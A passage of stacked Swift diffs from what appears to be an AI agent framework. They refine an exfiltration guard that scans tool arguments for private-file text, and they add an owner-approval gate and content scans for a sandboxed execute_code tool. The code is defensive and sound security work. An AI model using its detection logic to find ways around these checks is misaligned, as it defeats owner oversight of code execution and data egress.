-    private let windowsByFingerprint: [UInt64: [[Character]]]
+    /// A window's provenance: which normalized source it came from and where it starts. The
+    /// window graphemes themselves live once in `sources`, not copied per overlapping position.
+    private struct Window: Sendable {
+      let source: Int
+      let start: Int
+    }
+
+    /// Each source text normalized to NFC and stored ONCE, only for sources long enough to hold a
+    /// full window. Confirmation slices back into these rather than into duplicated window arrays.
+    private let sources: [[Character]]
+    private let windowsByFingerprint: [UInt64: [Window]]
 
     public init(texts: [String]) {
       let width = ExfilArgGuard.substringThresholdGraphemes
-      var indexed: [UInt64: [[Character]]] = [:]
+      var storedSources: [[Character]] = []
+      var indexed: [UInt64: [Window]] = [:]
 
       for text in texts {
         let characters = Array(text.precomposedStringWithCanonicalMapping)
@@ -21,12 +32,16 @@ public struct ExfilArgGuard: Sendable {
           continue
         }
 
+        let sourceIndex = storedSources.count
+        storedSources.append(characters)
+
         for start in 0...(characters.count - width) {
-          let window = Array(characters[start..<(start + width)])
-          indexed[ExfilArgGuard.windowFingerprint(window), default: []].append(window)
+          let fingerprint = ExfilArgGuard.windowFingerprint(characters[start..<(start + width)])
+          indexed[fingerprint, default: []].append(Window(source: sourceIndex, start: start))
         }
       }
 
+      sources = storedSources
       windowsByFingerprint = indexed
     }
 
@@ -40,11 +55,14 @@ public struct ExfilArgGuard: Sendable {
       for start in 0...(characters.count - width) {
         let candidate = characters[start..<(start + width)]
         let fingerprint = ExfilArgGuard.windowFingerprint(candidate)
-        guard let sourceWindows = windowsByFingerprint[fingerprint] else {
+        guard let windows = windowsByFingerprint[fingerprint] else {
           continue
         }
-        let matched = sourceWindows.contains { source in
-          candidate.elementsEqual(source)
+        // The fingerprint only narrows the set; confirm grapheme-for-grapheme so a hash
+        // collision can never false-block.
+        let matched = windows.contains { window in
+          let source = sources[window.source]
+          return candidate.elementsEqual(source[window.start..<(window.start + width)])
         }
         if matched {
           return String(candidate)

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -1,9 +1,9 @@
 import ClawCore
 import Foundation
 
-/// The unconditional arg-guard tier, the trifecta condition, the tier-3 disk-time substring
-/// check, and the web_fetch approval decision. Pure — every input
-/// arrives via the call/context; tier-3 texts via the injected loader (disk at gate time).
+/// The single policy gate for safe, ask-tier, and dangerous tools. Safe egress retains the
+/// unconditional/trifecta tiers; ask-tier actions resolve owner consent; dangerous actions may
+/// park only after the tool prepares, scans, and binds the exact recorded action.
 public struct ToolPolicyGate: Sendable {
   public enum Verdict: Sendable, Equatable {
     /// `action` is the gate-resolved canonical action for `.arbitraryDestination` tools — the
@@ -18,29 +18,36 @@ public struct ToolPolicyGate: Sendable {
 
   private let argGuard: ExfilArgGuard
   private let privateFileLoader: @Sendable () -> [String]
+  private let execEnabled: Bool
 
-  public init(argGuard: ExfilArgGuard, privateFileLoader: @escaping @Sendable () -> [String]) {
+  public init(
+    argGuard: ExfilArgGuard,
+    privateFileLoader: @escaping @Sendable () -> [String],
+    execEnabled: Bool
+  ) {
     self.argGuard = argGuard
     self.privateFileLoader = privateFileLoader
+    self.execEnabled = execEnabled
   }
 
   public func evaluate(
     call: ToolCall,
     tool: any Tool,
     context: ToolDispatchContext
-  ) -> Verdict {
-    // (1) ask-tier is evaluated FIRST, before the egress fast-path: an ask-tier tool
-    // reaches the durable approval arm regardless of egress class — an ask-tier file_write has
-    // egress `.none` yet must still park for the owner's decision.
-    // INVARIANT: this arm returns before the unconditional/conditional arg-guard and redaction
-    // tiers run, which is safe ONLY while every ask-tier tool is `.none`-egress (nothing leaves
-    // the host). An ask-tier tool WITH egress must move this arm below those tiers or re-run
-    // them inside `evaluateAskTier`.
-    if tool.definition.riskLevel == .ask {
+  ) async -> Verdict {
+    // Total over RiskLevel. Ask-tier resolves before the egress fast-path so a `.none`-egress
+    // ask tool (file_write) still parks; dangerous consumes only a tool-prepared action; safe
+    // egress falls through to the unconditional/trifecta tiers below.
+    switch tool.definition.riskLevel {
+    case .ask:
       return evaluateAskTier(call: call, tool: tool, context: context)
+    case .dangerous:
+      return await evaluateDangerousTier(call: call, tool: tool, context: context)
+    case .safe:
+      break
     }
 
-    // (2) .none-egress fast path — a safe non-egress read (file_read): audit-render only.
+    // .none-egress fast path — a safe non-egress read (file_read): audit-render only.
     guard tool.definition.egressClass != .none else {
       return .allow(
         argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON),
@@ -48,23 +55,22 @@ public struct ToolPolicyGate: Sendable {
       )
     }
 
-    // (3) unconditional tier — BLOCKING, every egress class
+    // Unconditional tier — BLOCKING, every egress class.
     let unconditional = argGuard.evaluateUnconditional(argsJSON: call.argumentsJSON)
     if let rule = unconditional.blockedRule {
       return blockedArgs(rule: rule, argsRedacted: unconditional.redactedArgs)
     }
 
-    // (4) trifecta condition: tainted(session ∪ run) && privateData(assembly ∪ run ∪ session)
+    // Trifecta condition: tainted(session ∪ run) && privateData(assembly ∪ run ∪ session). The
+    // session flag survives a window roll, closing the over-cap gap the per-assembly leg cannot.
     let tainted = context.sessionTainted || context.runIngestedUntrusted
-    // Three private-data sources — the per-assembly leg, the run-local leg, and the
-    // persisted session flag that survives a window roll (the over-cap gap).
     let privateData =
       context.assemblyPrivateData || context.runPrivateData || context.sessionHasPrivateData
     guard tainted && privateData else {
       return resolveAndAllow(call: call, tool: tool, argsRedacted: unconditional.redactedArgs)
     }
 
-    // (4a) conditional tier — redaction-block WINS over approval; disk at gate time
+    // Conditional tier — redaction-block WINS over approval; disk at gate time.
     let conditional = argGuard.evaluateConditional(
       argsJSON: call.argumentsJSON,
       privateFileTexts: privateFileLoader()
@@ -73,9 +79,8 @@ public struct ToolPolicyGate: Sendable {
       return blockedArgs(rule: rule, argsRedacted: conditional.redactedArgs)
     }
 
-    // (5) trifecta arm — DURABLE: a would-park action suspends onto the approval
-    // fabric via `.requireApproval`. Non-interactive runs take the SAME park (→ EXPIRED → DENY),
-    // never an immediate gate DENY. Recorded-args execution subsumes the retired one-turn grant.
+    // Trifecta arm — DURABLE: a would-park action suspends onto the approval fabric. Non-interactive
+    // runs take the SAME park (→ EXPIRED → DENY), never an immediate gate DENY.
     let action: ToolAction?
     switch resolveAction(call: call, tool: tool) {
     case .action(let resolved):
@@ -288,6 +293,87 @@ private extension ToolPolicyGate {
   }
 }
 
+// MARK: - Dangerous-tier Approval
+
+private extension ToolPolicyGate {
+  /// Dangerous tools park ONLY over a tool-prepared canonical action. The `execEnabled` backstop
+  /// fails closed; the arg-guard scans run over the prepared `guardTexts` (never the model's raw
+  /// arguments), and the recorded action binds the prepared canonical JSON verbatim.
+  func evaluateDangerousTier(
+    call: ToolCall,
+    tool: any Tool,
+    context: ToolDispatchContext
+  ) async -> Verdict {
+    guard execEnabled else {
+      return dangerousBlock(reason: "Code execution is disabled.", call: call)
+    }
+    guard let arguments = JSONValue.parse(call.argumentsJSON) else {
+      return dangerousBlock(reason: "Malformed arguments for \(call.name).", call: call)
+    }
+    guard let resolution = await tool.prepareAction(arguments: arguments) else {
+      return dangerousBlock(
+        reason: "\(call.name) is dangerous-tier but prepared no action.",
+        call: call
+      )
+    }
+
+    let prepared: PreparedToolAction
+    switch resolution {
+    case .prepared(let action):
+      prepared = action
+    case .refused(let reason):
+      return dangerousBlock(reason: reason, call: call)
+    }
+
+    let argsRedacted = argGuard.renderRedacted(argsJSON: prepared.canonicalArgsJSON)
+    for text in prepared.guardTexts {
+      let verdict = argGuard.evaluate(text: text)
+      if let rule = verdict.blockedRule {
+        return blockedArgs(rule: rule, argsRedacted: "[REDACTED:\(rule)]")
+      }
+    }
+
+    // The disk-time private-substring scan runs only when the prepared action can leave the host.
+    if prepared.canExfiltrate {
+      let privateIndex = ExfilArgGuard.PrivateTextIndex(texts: privateFileLoader())
+      for text in prepared.guardTexts {
+        let verdict = argGuard.evaluateConditional(text: text, index: privateIndex)
+        if let rule = verdict.blockedRule {
+          return blockedArgs(rule: rule, argsRedacted: "[REDACTED:\(rule)]")
+        }
+      }
+    }
+
+    guard context.approvalAlreadyPending == false else {
+      return .block(
+        payload: ToolPayload(
+          content: "blocked: an approval is already pending",
+          status: .blockedPendingApproval,
+          ingestedUntrusted: false
+        ),
+        argsRedacted: argsRedacted
+      )
+    }
+
+    let recorded = RecordedToolAction(
+      tool: call.name,
+      canonicalArgsJSON: prepared.canonicalArgsJSON,
+      argsHash: ApprovalArgsHash.sha256Hex(prepared.canonicalArgsJSON),
+      canonicalTarget: prepared.canonicalTarget,
+      reason: .codeExec,
+      presentation: prepared.presentation
+    )
+    return .requireApproval(recorded: recorded)
+  }
+
+  func dangerousBlock(reason: String, call: ToolCall) -> Verdict {
+    .block(
+      payload: ToolPayload(content: reason, status: .error, ingestedUntrusted: false),
+      argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON)
+    )
+  }
+}
+
 /// The full per-call order behind the loop's `ToolDispatching` seam: (0) lookup → (1) parse →
 /// (2)/(3) gate → (4) execute under the tool's own timeout. Audit is the LOOP's job.
 public struct GatedToolDispatcher: ToolDispatching {
@@ -326,7 +412,7 @@ public struct GatedToolDispatcher: ToolDispatching {
       return errorOutcome(call: call, reason: "Malformed arguments for \(call.name).")
     }
     // (2)/(3) the gate
-    switch gate.evaluate(call: call, tool: tool, context: context) {
+    switch await gate.evaluate(call: call, tool: tool, context: context) {
     case .block(let payload, let argsRedacted):
       return ToolDispatchOutcome(
         observation: ToolObservation(call: call, payload: payload),
@@ -344,7 +430,7 @@ public struct GatedToolDispatcher: ToolDispatching {
           status: .blockedPendingApproval,
           ingestedUntrusted: false
         ),
-        argsRedacted: gate.renderRedacted(argsJSON: call.argumentsJSON),
+        argsRedacted: gate.renderRedacted(argsJSON: recorded.canonicalArgsJSON),
         requiresApproval: recorded
       )
     case .allow(let argsRedacted, let action):

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -307,6 +307,18 @@ private extension ToolPolicyGate {
     guard execEnabled else {
       return dangerousBlock(reason: "Code execution is disabled.", call: call)
     }
+    // A dangerous action can never take the second approval slot, and it cannot park or execute
+    // while one is pending, so refuse here before the expensive staging and content scans run.
+    guard context.approvalAlreadyPending == false else {
+      return .block(
+        payload: ToolPayload(
+          content: "blocked: an approval is already pending",
+          status: .blockedPendingApproval,
+          ingestedUntrusted: false
+        ),
+        argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON)
+      )
+    }
     guard let arguments = JSONValue.parse(call.argumentsJSON) else {
       return dangerousBlock(reason: "Malformed arguments for \(call.name).", call: call)
     }
@@ -325,7 +337,6 @@ private extension ToolPolicyGate {
       return dangerousBlock(reason: reason, call: call)
     }
 
-    let argsRedacted = argGuard.renderRedacted(argsJSON: prepared.canonicalArgsJSON)
     for text in prepared.guardTexts {
       let verdict = argGuard.evaluate(text: text)
       if let rule = verdict.blockedRule {
@@ -342,17 +353,6 @@ private extension ToolPolicyGate {
           return blockedArgs(rule: rule, argsRedacted: "[REDACTED:\(rule)]")
         }
       }
-    }
-
-    guard context.approvalAlreadyPending == false else {
-      return .block(
-        payload: ToolPayload(
-          content: "blocked: an approval is already pending",
-          status: .blockedPendingApproval,
-          ingestedUntrusted: false
-        ),
-        argsRedacted: argsRedacted
-      )
     }
 
     let recorded = RecordedToolAction(

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -402,12 +402,14 @@ private extension ExecuteCodeTool {
     let totalBytes = recorded.stage.reduce(0) { partial, stage in
       partial + stage.bytes
     }
+    // The path and realpath are model- and filesystem-derived, so a loaded secret could sit inside
+    // one; redact them for the owner-facing preview while the canonical action keeps the true values.
     let stagedSummary =
       recorded.stage.isEmpty
       ? "Staged inputs: none"
       : (["Staged inputs:"]
         + recorded.stage.map { stage in
-          "- \(stage.path) | \(stage.realpath) | \(stage.bytes) B | \(stage.sha256.prefix(16))"
+          "- \(redactor.redact(stage.path)) | \(redactor.redact(stage.realpath)) | \(stage.bytes) B | \(stage.sha256.prefix(16))"
         }).joined(separator: "\n")
     let preview = """
       ```\(recorded.language.rawValue)

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -1,0 +1,359 @@
+import ClawCore
+import Foundation
+
+public struct ExecuteCodeSettings: Sendable, Equatable {
+  public let memoryMiB: Int
+  public let cpus: Int
+  public let timeout: Duration
+  public let allowEgress: Bool
+
+  public init(memoryMiB: Int, cpus: Int, timeout: Duration, allowEgress: Bool) {
+    self.memoryMiB = memoryMiB
+    self.cpus = cpus
+    self.timeout = timeout
+    self.allowEgress = allowEgress
+  }
+}
+
+public struct ExecuteCodeTool: Tool {
+  public static let maxCodeBytes = 16 * 1024
+  public static let maxStagedFileBytes = 1024 * 1024
+  public static let maxStagedTotalBytes = 4 * 1024 * 1024
+  public static let maxStagedFiles = 16
+  public static let rawOutputTruncationNotice =
+    "[raw output truncated after the first 1 MiB of one or more streams]"
+
+  let workspaceRoot: URL
+  let backend: any ExecutionBackend
+  let settings: ExecuteCodeSettings
+  let redactor: SecretRedactor
+
+  public init(
+    workspaceRoot: URL,
+    backend: any ExecutionBackend,
+    settings: ExecuteCodeSettings,
+    redactor: SecretRedactor
+  ) {
+    self.workspaceRoot = workspaceRoot
+    self.backend = backend
+    self.settings = settings
+    self.redactor = redactor
+  }
+
+  public var definition: ToolDefinition {
+    ToolDefinition(
+      name: "execute_code",
+      description:
+        "Run a short Python or shell script in a locked-down, throwaway sandbox (owner approval required; no network unless explicitly requested).",
+      parameters: .object([
+        "type": .string("object"),
+        "properties": .object([
+          "language": .object([
+            "type": .string("string"),
+            "enum": .array([.string("python"), .string("sh")]),
+          ]),
+          "code": .object(["type": .string("string")]),
+          "stage": .object([
+            "type": .string("array"),
+            "items": .object(["type": .string("string")]),
+          ]),
+          "network": .object([
+            "type": .string("boolean"),
+            "default": .bool(false),
+          ]),
+        ]),
+        "required": .array([.string("language"), .string("code")]),
+      ]),
+      egressClass: .none,
+      riskLevel: .dangerous
+    )
+  }
+
+  public var timeout: Duration {
+    settings.timeout + .seconds(20)
+  }
+
+  public func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution? {
+    nil
+  }
+
+  public func prepareAction(arguments: JSONValue) async -> PreparedActionResolution? {
+    guard let raw = Self.decode(RawArguments.self, from: arguments) else {
+      return .refused(
+        reason: "execute_code needs language, code, stage, and network in their declared types."
+      )
+    }
+    guard let language = ExecLanguage(rawValue: raw.language) else {
+      return .refused(reason: "execute_code supports only python and sh.")
+    }
+    guard raw.code.utf8.count <= Self.maxCodeBytes else {
+      return .refused(reason: "The script exceeds the 16 KiB code cap.")
+    }
+
+    let paths = raw.stage ?? []
+    guard paths.count <= Self.maxStagedFiles else {
+      return .refused(reason: "execute_code stages at most 16 files.")
+    }
+    let network = raw.network ?? false
+    guard network == false || settings.allowEgress else {
+      return .refused(reason: "Networked code execution is disabled by configuration.")
+    }
+
+    switch authorizeAndLoad(paths: paths) {
+    case .failure(let reason):
+      return .refused(reason: reason)
+    case .success(let loaded):
+      let privateData = loaded.contains { stage in
+        isPrivate(realpath: stage.record.realpath)
+      }
+      let recorded = RecordedArguments(
+        code: raw.code,
+        language: language,
+        network: network,
+        readsPrivateData: privateData,
+        stage: loaded.map(\.record)
+      )
+      guard let canonicalArgsJSON = Self.canonicalJSON(recorded) else {
+        return .refused(reason: "The prepared code action could not be encoded safely.")
+      }
+      let target =
+        "code_exec:\(language.rawValue):"
+        + String(SHA256Digest.hex(Data(canonicalArgsJSON.utf8)).prefix(16))
+      return .prepared(
+        PreparedToolAction(
+          canonicalTarget: target,
+          canonicalArgsJSON: canonicalArgsJSON,
+          presentation: preliminaryPresentation(raw: raw, recorded: recorded),
+          guardTexts: [raw.code] + loaded.map(\.guardText),
+          canExfiltrate: network
+        )
+      )
+    }
+  }
+
+  public func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload {
+    ToolPayload(
+      content:
+        "The recorded code action is not executable until its approval binding is revalidated.",
+      status: .error,
+      ingestedUntrusted: false
+    )
+  }
+}
+
+// MARK: - Argument Values
+
+private extension ExecuteCodeTool {
+  struct RawArguments: Codable {
+    let language: String
+    let code: String
+    let stage: [String]?
+    let network: Bool?
+  }
+
+  struct RecordedStage: Codable, Equatable {
+    let bytes: Int
+    let path: String
+    let realpath: String
+    let sha256: String
+  }
+
+  struct RecordedArguments: Codable, Equatable {
+    let code: String
+    let language: ExecLanguage
+    let network: Bool
+    let readsPrivateData: Bool
+    let stage: [RecordedStage]
+  }
+
+  struct AuthorizedStage {
+    let path: String
+    let realpath: String
+    let basename: String
+  }
+
+  struct LoadedStage {
+    let record: RecordedStage
+    let basename: String
+    let bytes: Data
+
+    var guardText: String {
+      String(decoding: bytes, as: UTF8.self)
+    }
+  }
+}
+
+// MARK: - Staging Authorization
+
+private extension ExecuteCodeTool {
+  enum StageLoadResult {
+    case success([LoadedStage])
+    case failure(String)
+  }
+
+  func authorizeAndLoad(paths: [String]) -> StageLoadResult {
+    guard WorkspacePathContainment.canonicalPath(workspaceRoot.path) != nil else {
+      return .failure("The workspace root is unavailable.")
+    }
+
+    var authorized: [AuthorizedStage] = []
+    var normalizedNames = Set<String>()
+    var totalStatBytes = 0
+
+    for path in paths {
+      let realpath: String
+      switch WorkspacePathContainment.resolveExisting(path: path, root: workspaceRoot.path) {
+      case .refused(let reason):
+        return .failure(reason)
+      case .resolved(let resolved):
+        realpath = resolved
+      }
+
+      let attributes: [FileAttributeKey: Any]
+      do {
+        attributes = try FileManager.default.attributesOfItem(atPath: realpath)
+      } catch {
+        return .failure("A staged file became unavailable before it could be inspected.")
+      }
+      guard attributes[.type] as? FileAttributeType == .typeRegular else {
+        return .failure("Every staged path must resolve to a regular file.")
+      }
+      guard let number = attributes[.size] as? NSNumber else {
+        return .failure("A staged file size could not be determined.")
+      }
+      let statBytes = number.intValue
+      guard statBytes <= Self.maxStagedFileBytes else {
+        return .failure("A staged file exceeds the 1 MiB per-file cap.")
+      }
+      let (nextTotal, overflow) = totalStatBytes.addingReportingOverflow(statBytes)
+      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+        return .failure("Staged files exceed the 4 MiB total cap.")
+      }
+      totalStatBytes = nextTotal
+
+      let basename = (path as NSString).lastPathComponent
+      let normalized = Self.normalizedBasename(basename)
+      guard normalized.hasPrefix(".clawd-entrypoint.") == false else {
+        return .failure("Staged files may not use the reserved .clawd-entrypoint.* namespace.")
+      }
+      guard normalizedNames.insert(normalized).inserted else {
+        return .failure("Staged files must have unique flat basenames.")
+      }
+
+      authorized.append(
+        AuthorizedStage(
+          path: path,
+          realpath: realpath,
+          basename: basename
+        )
+      )
+    }
+
+    var loaded: [LoadedStage] = []
+    var totalReadBytes = 0
+    for stage in authorized {
+      let data: Data
+      do {
+        guard
+          let bounded = try Self.readBoundedFile(
+            atPath: stage.realpath,
+            maxBytes: Self.maxStagedFileBytes
+          )
+        else {
+          return .failure("A staged file grew past the 1 MiB cap while it was read.")
+        }
+        data = bounded
+      } catch {
+        return .failure("A staged file became unreadable before it could be prepared.")
+      }
+      let (nextTotal, overflow) = totalReadBytes.addingReportingOverflow(data.count)
+      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+        return .failure("Staged files grew past the 4 MiB total cap while they were read.")
+      }
+      totalReadBytes = nextTotal
+
+      loaded.append(
+        LoadedStage(
+          record: RecordedStage(
+            bytes: data.count,
+            path: stage.path,
+            realpath: stage.realpath,
+            sha256: SHA256Digest.hex(data)
+          ),
+          basename: stage.basename,
+          bytes: data
+        )
+      )
+    }
+
+    return .success(loaded)
+  }
+}
+
+extension ExecuteCodeTool {
+  static func readBoundedFile(atPath path: String, maxBytes: Int) throws -> Data? {
+    let handle = try FileHandle(forReadingFrom: URL(fileURLWithPath: path))
+    defer { try? handle.close() }
+
+    var data = Data()
+    while data.count <= maxBytes {
+      let remaining = maxBytes + 1 - data.count
+      guard let chunk = try handle.read(upToCount: remaining), chunk.isEmpty == false else {
+        return data
+      }
+      data.append(chunk)
+    }
+    return nil
+  }
+}
+
+private extension ExecuteCodeTool {
+  static func normalizedBasename(_ basename: String) -> String {
+    basename.precomposedStringWithCanonicalMapping
+      .lowercased(with: Locale(identifier: "en_US_POSIX"))
+      .precomposedStringWithCanonicalMapping
+  }
+
+  func isPrivate(realpath: String) -> Bool {
+    guard let canonicalRoot = WorkspacePathContainment.canonicalPath(workspaceRoot.path) else {
+      return false
+    }
+    return realpath == canonicalRoot + "/MEMORY.md"
+      || realpath == canonicalRoot + "/USER.md"
+  }
+}
+
+// MARK: - Canonical Encoding
+
+private extension ExecuteCodeTool {
+  static func decode<Value: Decodable>(_ type: Value.Type, from arguments: JSONValue) -> Value? {
+    guard let data = try? JSONEncoder().encode(arguments) else {
+      return nil
+    }
+    return try? JSONDecoder().decode(type, from: data)
+  }
+
+  static func canonicalJSON<Value: Encodable>(_ value: Value) -> String? {
+    let encoder = JSONEncoder()
+    encoder.outputFormatting = [.sortedKeys, .withoutEscapingSlashes]
+    guard
+      let data = try? encoder.encode(value),
+      let json = String(data: data, encoding: .utf8)
+    else {
+      return nil
+    }
+    return json
+  }
+
+  func preliminaryPresentation(
+    raw: RawArguments,
+    recorded: RecordedArguments
+  ) -> ToolApprovalPresentation {
+    ToolApprovalPresentation(
+      blastRadius: "run \(recorded.language.rawValue) · egress: \(recorded.network ? "yes" : "no")",
+      contentPreview: redactor.redact(raw.code),
+      warnings: recorded.network
+        ? ["network egress is enabled — this run can send data out"] : []
+    )
+  }
+}

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -239,6 +239,9 @@ private extension ExecuteCodeTool {
     let bytes: Data
 
     var guardText: String {
+      // Lossy on purpose: a failable UTF-8 decode would fold invalid bytes to nil and blind the
+      // exfiltration guard, while lossy decoding still surfaces every scannable substring.
+      // swiftlint:disable:next optional_data_string_conversion
       String(decoding: bytes, as: UTF8.self)
     }
   }

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -352,15 +352,56 @@ extension ExecuteCodeTool {
       }
       data.append(chunk)
     }
+
     return nil
   }
 }
 
 private extension ExecuteCodeTool {
+  enum BasenameValidation {
+    case accepted(String)
+    case reservedNamespace
+    case duplicate
+  }
+
+  static func validateBasename(
+    of path: String,
+    claimed normalizedNames: inout Set<String>
+  ) -> BasenameValidation {
+    let basename = (path as NSString).lastPathComponent
+    let normalized = normalizedBasename(basename)
+
+    guard normalized.hasPrefix(".clawd-entrypoint.") == false else {
+      return .reservedNamespace
+    }
+
+    guard normalizedNames.insert(normalized).inserted else {
+      return .duplicate
+    }
+
+    return .accepted(basename)
+  }
+
+  static func totalWithinCap(adding bytes: Int, to total: Int) -> Int? {
+    let (nextTotal, overflow) = total.addingReportingOverflow(bytes)
+
+    guard overflow == false, nextTotal <= maxStagedTotalBytes else {
+      return nil
+    }
+
+    return nextTotal
+  }
+
   static func normalizedBasename(_ basename: String) -> String {
     basename.precomposedStringWithCanonicalMapping
       .lowercased(with: Locale(identifier: "en_US_POSIX"))
       .precomposedStringWithCanonicalMapping
+  }
+
+  func readsPrivateData(in stages: [LoadedStage]) -> Bool {
+    stages.contains { stage in
+      isPrivate(realpath: stage.record.realpath)
+    }
   }
 
   func isPrivate(realpath: String) -> Bool {
@@ -394,6 +435,11 @@ private extension ExecuteCodeTool {
     return json
   }
 
+  static func canonicalTarget(language: ExecLanguage, canonicalArgsJSON: String) -> String {
+    "code_exec:\(language.rawValue):"
+      + String(SHA256Digest.hex(Data(canonicalArgsJSON.utf8)).prefix(16))
+  }
+
   func approvalPresentation(
     raw: RawArguments,
     recorded: RecordedArguments
@@ -425,6 +471,22 @@ private extension ExecuteCodeTool {
       warnings: recorded.network
         ? ["network egress is enabled — this run can send data out"] : []
     )
+  }
+
+  func stagedInputsSummary(_ stages: [RecordedStage]) -> String {
+    guard stages.isEmpty == false else {
+      return "Staged inputs: none"
+    }
+    // The path and realpath are model- and filesystem-derived, so a loaded secret could sit inside
+    // one; redact them for the owner-facing preview while the canonical action keeps the true values.
+    var lines = ["Staged inputs:"]
+    for stage in stages {
+      let path = redactor.redact(stage.path)
+      let realpath = redactor.redact(stage.realpath)
+      lines.append("- \(path) | \(realpath) | \(stage.bytes) B | \(stage.sha256.prefix(16))")
+    }
+
+    return lines.joined(separator: "\n")
   }
 }
 

--- a/Sources/ClawTools/Tools/ExecuteCodeTool.swift
+++ b/Sources/ClawTools/Tools/ExecuteCodeTool.swift
@@ -103,22 +103,17 @@ public struct ExecuteCodeTool: Tool {
     case .failure(let reason):
       return .refused(reason: reason)
     case .success(let loaded):
-      let privateData = loaded.contains { stage in
-        isPrivate(realpath: stage.record.realpath)
-      }
       let recorded = RecordedArguments(
         code: raw.code,
         language: language,
         network: network,
-        readsPrivateData: privateData,
+        readsPrivateData: readsPrivateData(in: loaded),
         stage: loaded.map(\.record)
       )
       guard let canonicalArgsJSON = Self.canonicalJSON(recorded) else {
         return .refused(reason: "The prepared code action could not be encoded safely.")
       }
-      let target =
-        "code_exec:\(language.rawValue):"
-        + String(SHA256Digest.hex(Data(canonicalArgsJSON.utf8)).prefix(16))
+      let target = Self.canonicalTarget(language: language, canonicalArgsJSON: canonicalArgsJSON)
       return .prepared(
         PreparedToolAction(
           canonicalTarget: target,
@@ -141,14 +136,17 @@ public struct ExecuteCodeTool: Tool {
     guard let canonicalArgsJSON = Self.canonicalJSON(recorded) else {
       return errorPayload("The recorded code action cannot be re-encoded safely; nothing ran.")
     }
-    let expectedTarget =
-      "code_exec:\(recorded.language.rawValue):"
-      + String(SHA256Digest.hex(Data(canonicalArgsJSON.utf8)).prefix(16))
+
+    let expectedTarget = Self.canonicalTarget(
+      language: recorded.language,
+      canonicalArgsJSON: canonicalArgsJSON
+    )
     guard expectedTarget == approvedTarget else {
       return errorPayload(
         "The recorded code action no longer matches its approved target; nothing ran."
       )
     }
+
     guard recorded.code.utf8.count <= Self.maxCodeBytes else {
       return errorPayload("The recorded script exceeds the approved code cap; nothing ran.")
     }
@@ -163,10 +161,8 @@ public struct ExecuteCodeTool: Tool {
     case .success(let stages):
       loaded = stages
     }
-    let privateData = loaded.contains { stage in
-      isPrivate(realpath: stage.record.realpath)
-    }
-    guard privateData == recorded.readsPrivateData else {
+
+    guard readsPrivateData(in: loaded) == recorded.readsPrivateData else {
       return errorPayload(
         "The staged private-data classification changed after approval; nothing ran."
       )
@@ -186,6 +182,7 @@ public struct ExecuteCodeTool: Tool {
       network: recorded.network,
       timeout: settings.timeout
     )
+
     return map(result: await backend.run(request), readsPrivateData: recorded.readsPrivateData)
   }
 }
@@ -279,29 +276,32 @@ private extension ExecuteCodeTool {
       } catch {
         return .failure("A staged file became unavailable before it could be inspected.")
       }
+
       guard attributes[.type] as? FileAttributeType == .typeRegular else {
         return .failure("Every staged path must resolve to a regular file.")
       }
       guard let number = attributes[.size] as? NSNumber else {
         return .failure("A staged file size could not be determined.")
       }
+
       let statBytes = number.intValue
       guard statBytes <= Self.maxStagedFileBytes else {
         return .failure("A staged file exceeds the 1 MiB per-file cap.")
       }
-      let (nextTotal, overflow) = totalStatBytes.addingReportingOverflow(statBytes)
-      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+
+      guard let nextTotal = Self.totalWithinCap(adding: statBytes, to: totalStatBytes) else {
         return .failure("Staged files exceed the 4 MiB total cap.")
       }
       totalStatBytes = nextTotal
 
-      let basename = (path as NSString).lastPathComponent
-      let normalized = Self.normalizedBasename(basename)
-      guard normalized.hasPrefix(".clawd-entrypoint.") == false else {
+      let basename: String
+      switch Self.validateBasename(of: path, claimed: &normalizedNames) {
+      case .reservedNamespace:
         return .failure("Staged files may not use the reserved .clawd-entrypoint.* namespace.")
-      }
-      guard normalizedNames.insert(normalized).inserted else {
+      case .duplicate:
         return .failure("Staged files must have unique flat basenames.")
+      case .accepted(let accepted):
+        basename = accepted
       }
 
       authorized.append(
@@ -330,8 +330,8 @@ private extension ExecuteCodeTool {
       } catch {
         return .failure("A staged file became unreadable before it could be prepared.")
       }
-      let (nextTotal, overflow) = totalReadBytes.addingReportingOverflow(data.count)
-      guard overflow == false, nextTotal <= Self.maxStagedTotalBytes else {
+
+      guard let nextTotal = Self.totalWithinCap(adding: data.count, to: totalReadBytes) else {
         return .failure("Staged files grew past the 4 MiB total cap while they were read.")
       }
       totalReadBytes = nextTotal
@@ -463,20 +463,11 @@ private extension ExecuteCodeTool {
     let totalBytes = recorded.stage.reduce(0) { partial, stage in
       partial + stage.bytes
     }
-    // The path and realpath are model- and filesystem-derived, so a loaded secret could sit inside
-    // one; redact them for the owner-facing preview while the canonical action keeps the true values.
-    let stagedSummary =
-      recorded.stage.isEmpty
-      ? "Staged inputs: none"
-      : (["Staged inputs:"]
-        + recorded.stage.map { stage in
-          "- \(redactor.redact(stage.path)) | \(redactor.redact(stage.realpath)) | \(stage.bytes) B | \(stage.sha256.prefix(16))"
-        }).joined(separator: "\n")
     let preview = """
       ```\(recorded.language.rawValue)
       \(redactor.redact(raw.code))
       ```
-      \(stagedSummary)
+      \(stagedInputsSummary(recorded.stage))
       """
 
     return ToolApprovalPresentation(
@@ -518,8 +509,7 @@ private extension ExecuteCodeTool {
       guard record.bytes >= 0, record.bytes <= Self.maxStagedFileBytes else {
         return .failure("A recorded staged-file size exceeds the approved cap; nothing ran.")
       }
